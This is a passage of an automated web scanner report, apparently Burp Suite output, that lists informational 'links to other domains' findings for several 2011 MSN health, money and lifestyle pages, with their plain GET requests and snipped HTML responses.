Content-Type: text/html; charset=utf-8
Content-Length: 48818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalhealth.112.2O7.net/b/ss/msnportalhealth/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSNHPR">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574490&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fhealth.msn.com%2Fhealth-topics%2Fquit-smoking%2Farticlepage.aspx%3Fcp-documentid%3D100269246%26gt1%3D31020&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=eat+less+salt&form=MSNS21">less salt</a>,</li><li><a href="http://www.bing.com/search?q=sleep+%26+PTSD+study&form=MSNS21">sleep & ptsd</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=hot+saucing&form=MSNS21">'hot saucing'</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=hormone+therapy+new+concerns&form=MSNS21">hormone therapy</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=in-vitro+meat&form=MSNS21">'in-vitro' meat</a>
...[SNIP]...
<li><a href="http://www.self.com/fooddiet/2009/06/30-healthy-snacks?mbid=synd_yshine" id="gted" CE="1">Hungry? Try one of these 30 healthy snacks</a>
...[SNIP]...
<li><a href="http://www.self.com/fitness/workouts/2007/06/six-day-body-slimming-slideshow?mbid=synd_msnhlth" id="gted" CE="2">Lose weight faster: 6 days to get slim</a>
...[SNIP]...
<li><a href="http://www.self.com/fooddiet/2010/06/superfoods-for-flat-abs-slideshow?mbid=synd_msnhlth" id="gted" CE="3">Try these superfoods for flatter abs</a>
...[SNIP]...
<li><a href="http://www.self.com/health/blogs/healthyself/2010/08/how-to-avoid-germs-at-the-gym.html?mbid=synd_msnhlth" id="gted" CE="4">Check out 10 ways to avoid germs at the gym</a>
...[SNIP]...
<li><a href="http://www.self.com/goal?mbid=synd_msnhlth" id="gted" CE="5">Reach your weight loss goal with SELF's no-stress fitness plan</a>
...[SNIP]...
<br>To be safe, ask for an <a href="http://www.self.com/health/2009/10/oral-cancer">oral cancer screening</a>
...[SNIP]...
</strong><a href="http://www.bing.com/search?q=strange+ways+to+quit+smoking&form=a8" target="_blank">Strange ways to quit smoking</a>
...[SNIP]...
<br><a href="http://www.self.com/health/2009/10/lung-cancer">Early detection</a>
...[SNIP]...
<br><a href="http://www.self.com/health/2009/10/reduce-cancer-risk-diet">Salt and smoked foods</a>
...[SNIP]...
chever comes first. Once you hit 30, you can have the test every two to three years if you've had normal results three years in a row and have the same partner. Women 30 and older should also consider <a href="http://www.self.com/health/2007/09/guide-on-getting-screened">screening for HPV</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=effectiveness+of+smoking+cessation+products&go=&form=A8" target="_blank">Bing: Effectiveness of Smoking Cessation Products</a>
...[SNIP]...
');" href="http://health.msn.com/health-topics/quit-smoking/articlepage.aspx?cp-documentid=100269246&gt1=31020&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ref="http://health.msn.com/health-topics/quit-smoking/articlepage.aspx?cp-documentid=100269246&gt1=31020&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div class="linkedimg"><a href="http://www.interactivemediaawards.com/winners/certificate.asp?param=75599&cat=1"><img src="http://blstb.msn.com/i/EB/CDCF1713B16AAB5B46B38A19D1EFDB.png" width="115" height="21" alt="IMA Winner 2010" />
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script><script type="text/javascript" src="http://health.msn.us.intellitxt.com/ast/js/msn/health.msn_cs.js"></script>
...[SNIP]...
<li class="first"><a onclick="return Msn.Navigation.OpenPopup(event,this,'width=986,height=740,resizeable=yes,scrollbars=yes,status=no,titlebar=no,toolbar=no')" href="http://onlinehelp.microsoft.com/en-us/msn/healthandfitness.aspx">Help</a>
...[SNIP]...

17.122. http://investing.money.msn.com/investments/stock-price previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.msn.com
Path:	/investments/stock-price

Issue detail

The page was loaded from a URL containing a query string:

http://investing.money.msn.com/investments/stock-price?Symbol=ups

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://blogs.barrons.com/stockstowatchtoday/2011/02/01/first-look-at-earnings-pfizer-adm-ups-beat-bp-misses/?mod=barrons_msnhttp://online.barrons.com/article/BL-SWB-20559.html?
http://blogs.wsj.com/marketbeat/2011/02/01/ups-fourth-quarter-profit-up-48-amid-surging-rev-margins/?mod=msn_money_ticker
http://calendar.live.com/
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://col.stc.s-msn.com/br/gbl/lg/csl/favicon.ico
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-msn.com/js/embed.js
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://money.bundle.com/categories/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://online.wsj.com/article/SB10001424052748703445904576117744064861626.html?ru=msn_money&mod=msn_money_ticker
http://online.wsj.com/article/SB10001424052748703445904576117864062440464.html?ru=msn_money&mod=msn_money_ticker
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://www.batstrading.com/
http://www.bing.com/customizeBrowser
http://www.bing.com/finance/stockscreener
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.marketwatch.com/News/Story/ups-fourth-quarter-profit-rises-48/story.aspx?guid={9C6691CA-E789-4B2E-80D8-444CD58179E8}&siteid=msn
http://www.morningstar.com/
http://www.myhomemsn.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.reuters.com/article/businessNews/idUSTRE71012W20110201?rpc=77
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&resize=false

Request

GET /investments/stock-price?Symbol=ups HTTP/1.1
Host: investing.money.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=skwbbgmishrfaa0v3jc2a4ig; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 01 Feb 2011 15:34:56 GMT
Content-Length: 80828
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
t Capitalization,Shares outstanding,United Parcel Service Inc,US:UPS,United Parcel Service Inc quote,US:UPS quote,United Parcel Service Inc change,US:UPS change,United Parcel Service Inc last quote" /><link rel="Shortcut Icon" href="http://col.stc.s-msn.com/br/gbl/lg/csl/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="http://investing.money.msn.com/sc/css/b0/8f83b90988ff7b93ae75bc90f904a8.css" media="all" />
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a></li><li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
<a href="http://mail.live.com/" class="flytrigger unreadcount">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com/">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a>
...[SNIP]...
<li class="first ">
<a id="hplink" href="http://www.myhomemsn.com/">Make MSN your homepage</a>
<a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search">
Web</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li class="flyout noscript"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<div><a href="http://online.wsj.com/article/SB10001424052748703445904576117744064861626.html?ru=msn_money&mod=msn_money_ticker">S&P Hits 1300</a>
...[SNIP]...
<div><a href="http://www.marketwatch.com/News/Story/ups-fourth-quarter-profit-rises-48/story.aspx?guid={9C6691CA-E789-4B2E-80D8-444CD58179E8}&siteid=msn">UPS fourth-quarter profit rises 48%; shares rise</a>
...[SNIP]...
<div><a href="http://online.wsj.com/article/SB10001424052748703445904576117864062440464.html?ru=msn_money&mod=msn_money_ticker">UPS Profit Increases 48%</a>
...[SNIP]...
<div><a href="http://blogs.barrons.com/stockstowatchtoday/2011/02/01/first-look-at-earnings-pfizer-adm-ups-beat-bp-misses/?mod=barrons_msnhttp://online.barrons.com/article/BL-SWB-20559.html?">First Look at Earnings: Pfizer, ADM, UPS Beat; BP Misses</a>
...[SNIP]...
<div><a href="http://www.reuters.com/article/businessNews/idUSTRE71012W20110201?rpc=77">UPS profit tops estimates, sees record in 2011</a>
...[SNIP]...
<div><a href="http://blogs.wsj.com/marketbeat/2011/02/01/ups-fourth-quarter-profit-up-48-amid-surging-rev-margins/?mod=msn_money_ticker">UPS Fourth Quarter Profit Up 48% Amid Surging Rev, Margins</a>
...[SNIP]...
<div class="br br1 brl" >

<script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" >Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" >click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/" >BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" >Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" >Morningstar Inc</a>. Analyst recommendations data provided by <a href="http://www.zacks.com/" >Zacks Investment Research</a>... IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" >Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm" >SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" >Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" >CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a>
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >Feedback</a>
...[SNIP]...
<li class=" first">
<a href="http://www.bing.com/finance/stockscreener" title="Stock screener on Bing">Stock screener on Bing</a>
...[SNIP]...
<li class="">
<a href="http://money.bundle.com/categories/" title="Message boards on Bundle">Message boards on Bundle</a>
...[SNIP]...
</a>
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise</a>
...[SNIP]...
<li class="last"><a class="popuplink" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&resize=false">Feedback</a>
...[SNIP]...

17.123. http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/staticslideshowglamour.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx?cp-documentid=26242711&gt1=32092

The response contains the following links to other domains:

http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/share
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.glamour.com/?mbid=msn
http://www.glamour.com/sex-love-life/2008/09/10-things-hes-thinking-when-youre-naked?mbid=synd_msn
http://www.glamour.com/sex-love-life/2009/09/12-secret-signs-hes-into-you?mbid=synd_msn
http://www.glamour.com/sex-love-life/2010/08/15-things-men-dont-want-you-to-know-about-them?mbid=synd_msn
http://www.glamour.com/sex-love-life/2010/10/mens-naked-body-quirks-explained?mbid=synd_msn
http://www.glamour.com/sex-love-life/2010/10/the-dos-and-donts-of-being-single?mbid=synd_msn
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660829&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Frelationships%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D26242711%26gt1%3D32092&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&cds_mag_code=GLM&id=1212175010742&lsid=81511416507026799&vid=1&cds_response_key=M8ELRMSNZ&cds_mag_code=GLM
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /relationships/staticslideshowglamour.aspx?cp-documentid=26242711&gt1=32092 HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8bae6383039c4a06bf162d4fa4b3986f; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=04EFEFBD5915440891B624F4BCE3029D; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 41170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660829&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Frelationships%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D26242711%26gt1%3D32092&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24">SAG awards</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24">kim kardashian</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24">next superman</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24">kacey jordan</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.glamour.com?mbid=msn"><img src="http://blstb.msn.com/i/57/CFFA9B69555B8E5C255A69F7F6A5.jpg" width="90" height="30" alt="Glamour" />
...[SNIP]...
<li class="first"><a href="http://www.glamour.com/sex-love-life/2008/09/10-things-hes-thinking-when-youre-naked?mbid=synd_msn ">10 Things He's Thinking When You're Naked </a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/08/15-things-men-dont-want-you-to-know-about-them?mbid=synd_msn ">15 Things Men Don't Want You to Know About Them </a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/10/the-dos-and-donts-of-being-single?mbid=synd_msn ">The Dos and Don'ts of Being Single </a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/10/mens-naked-body-quirks-explained?mbid=synd_msn ">Men's Naked Body Quirks Explained </a>
...[SNIP]...
<li class="last"><a href="http://www.glamour.com/sex-love-life/2009/09/12-secret-signs-hes-into-you?mbid=synd_msn ">12 Secret Signs He's Into You </a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx?cp-documentid=26242711&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
');" href="http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx?cp-documentid=26242711&gt1=32092&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ref="http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx?cp-documentid=26242711&gt1=32092&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div class="linkedimg"><a href="https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&cds_mag_code=GLM&id=1212175010742&lsid=81511416507026799&vid=1&cds_response_key=M8ELRMSNZ&cds_mag_code=GLM"><img src="http://blstb.msn.com/i/22/248EF6C657B86F0A8D9A35C6438F.jpg" width="300" height="75" alt="Glamour" />
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
